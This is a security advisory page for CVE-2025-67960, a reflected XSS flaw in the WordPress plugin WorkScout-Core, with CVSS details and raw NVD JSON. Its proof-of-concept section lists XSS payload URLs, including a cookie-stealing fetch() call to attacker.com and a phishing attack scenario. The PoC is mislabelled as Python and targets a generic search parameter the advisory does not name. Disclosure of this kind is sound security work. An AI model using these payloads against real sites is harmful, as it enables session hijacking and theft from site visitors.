Security Vulnerability Report
中文
CVE-2025-67960 CVSS 7.1 HIGH

CVE-2025-67960

Published: 2026-01-22 17:16:06
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS.This issue affects WorkScout-Core: from n/a through <= 1.7.06.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WorkScout-Core <= 1.7.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67960 WorkScout-Core Reflected XSS PoC --> <!-- Target: WordPress WorkScout-Core Plugin <= 1.7.06 --> <!-- Type: Reflected XSS --> <!-- PoC 1: Basic XSS via script tag --> PoC URL 1: https://target-site.com/?s=<script>alert(document.domain)</script> <!-- PoC 2: XSS via img onerror handler --> PoC URL 2: https://target-site.com/?s=<img src=x onerror=alert('XSS')> <!-- PoC 3: XSS via SVG element --> PoC URL 3: https://target-site.com/?s=<svg onload=alert(document.cookie)> <!-- PoC 4: Cookie stealing payload --> PoC URL 4: https://target-site.com/?s=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Attack Scenario: --> <!-- 1. Attacker crafts malicious URL with XSS payload --> <!-- 2. Attacker tricks victim into clicking the link (via phishing, social engineering) --> <!-- 3. Victim's browser executes the injected JavaScript --> <!-- 4. Attacker steals session cookies or performs actions on behalf of victim -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67960", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:05.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS.This issue affects WorkScout-Core: from n/a through <= 1.7.06."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en purethemes WorkScout-Core workscout-core permite XSS Reflejado. Este problema afecta a WorkScout-Core: desde n/a hasta &lt;= 1.7.06."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/workscout-core/vulnerability/wordpress-workscout-core-plugin-1-7-06-cross-site-scripting-xss-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}